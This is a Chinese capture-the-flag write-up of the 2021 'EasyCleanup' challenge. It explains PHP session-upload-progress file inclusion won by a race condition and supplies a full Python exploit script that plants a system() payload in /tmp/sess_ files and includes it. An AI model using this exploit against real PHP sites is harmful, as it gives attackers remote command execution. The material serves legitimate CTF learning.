[第五空间 2021]EasyCleanup

[第五空间 2021]EasyCleanup

临时文件包含

当 session 文件名（即 PHPSESSID）可控、且页面存在文件包含点时，可以包含 session.save_path 下的 session 文件（通常是 /tmp/sess_&lt;PHPSESSID&gt;）。配合 PHP_SESSION_UPLOAD_PROGRESS 表单字段，上传过程中 PHP 会把该字段的值写进这个 session 文件，从而把 payload 落到磁盘。注意 session.upload_progress.cleanup 默认开启，上传一结束这段内容就会被清掉，所以必须用多线程做条件竞争：一边不停上传，一边不停包含。

Python 脚本（条件竞争：一个线程持续上传写入 session 文件，主线程持续包含直到命中）

# -*- coding: utf-8 -*-
import io
import threading
import time

import requests

# Target and the attacker-chosen session id; the include path used later is
# '/tmp/sess_' + sessid, so the two must agree. (PHP is picky about the
# characters it accepts in a session id — keep it alphanumeric; verify if changed.)
myurl = 'http://1.14.71.254:28893/'
sessid = '7t0'

# Padding intended as the upload body: a bigger upload stays "in progress"
# longer, which is the window in which the session file holds the payload.
myfile = io.BytesIO(bytes(b'hakaiisu' * 1024))

# The value of this field is what ends up in the session file, so it carries
# the PHP payload verbatim.
writedata = dict(PHP_SESSION_UPLOAD_PROGRESS="<?php system('tac /nssctfasdasdflag');?>")
mycookie = dict(PHPSESSID=sessid)

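def writeshell(session):
    """Keep pushing the payload into the target's session file.

    Runs forever; it is meant to be started as a daemon thread. Every POST
    carries the PHP_SESSION_UPLOAD_PROGRESS field from `writedata` plus a file
    part, so that while the upload is in flight the field's value sits in
    sess_<sessid>, which is the file getshell tries to include.

    Fixes relative to the original: the padding prepared in `myfile` is now
    actually sent as the upload body (the original sent the integer 123, a
    three-byte upload that closes the race window almost immediately), and a
    connection error no longer kills the writer thread silently — which would
    leave getshell polling forever with nothing to race against.

    Args:
        session: accepted for interface compatibility; unused, requests are
            sent with the module-level `requests` helpers as in the original.
    """
    # NOTE(review): the progress field must come before the file part in the
    # multipart body for PHP to pick it up; requests emits `data` fields
    # before `files`, so this holds here — re-check if the HTTP client changes.
    body = myfile.getvalue()
    while True:
        try:
            requests.post(
                url=myurl,
                data=writedata,
                files={'file': ('hakaiisu.txt', body)},
                cookies=mycookie,
            )
        except requests.RequestException:
            # Back off briefly and keep trying rather than dying.
            time.sleep(0.1)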

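def getshell(session, *, max_tries=None):
    """Poll the include point until the planted session file is served.

    Each GET asks the vulnerable page to include /tmp/sess_<sessid>. A
    response containing 'upload_progress' means the session file was included
    while the writer's upload was still in flight (the race was won); its body
    — which then carries the command output — is printed and returned.

    Args:
        session: accepted for interface compatibility; unused (plain
            requests.get is used, as in the original).
        max_tries: stop after this many attempts instead of polling forever.
            None keeps the original unbounded loop.

    Returns:
        The winning response text, or None when max_tries is exhausted.
    """
    # Loop-invariant, so build it once. Concatenated on purpose rather than
    # passed via params=, which would percent-encode the slashes; the original
    # relied on the path arriving verbatim.
    payload_url = myurl + '?file=' + '/tmp/sess_' + sessid
    attempts = 0
    while max_tries is None or attempts < max_tries:
        attempts += 1
        try:
            resp = requests.get(url=payload_url)
        except requests.RequestException:
            # Transient network failure: retry instead of crashing mid-race.
            time.sleep(0.1)
            continue
        if 'upload_progress' in resp.text:
            print(resp.text)
            return resp.text
    return None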


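if __name__ == '__main__':
    session = requests.session()
    # Named `writer` rather than rebinding `writeshell`: the original assigned
    # the Thread to the function's own name, shadowing it for the rest of the
    # module. Daemon so the process exits as soon as getshell returns; the
    # writer itself loops forever.
    writer = threading.Thread(target=writeshell, args=(session,))
    writer.daemon = True
    writer.start()
    getshell(session)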
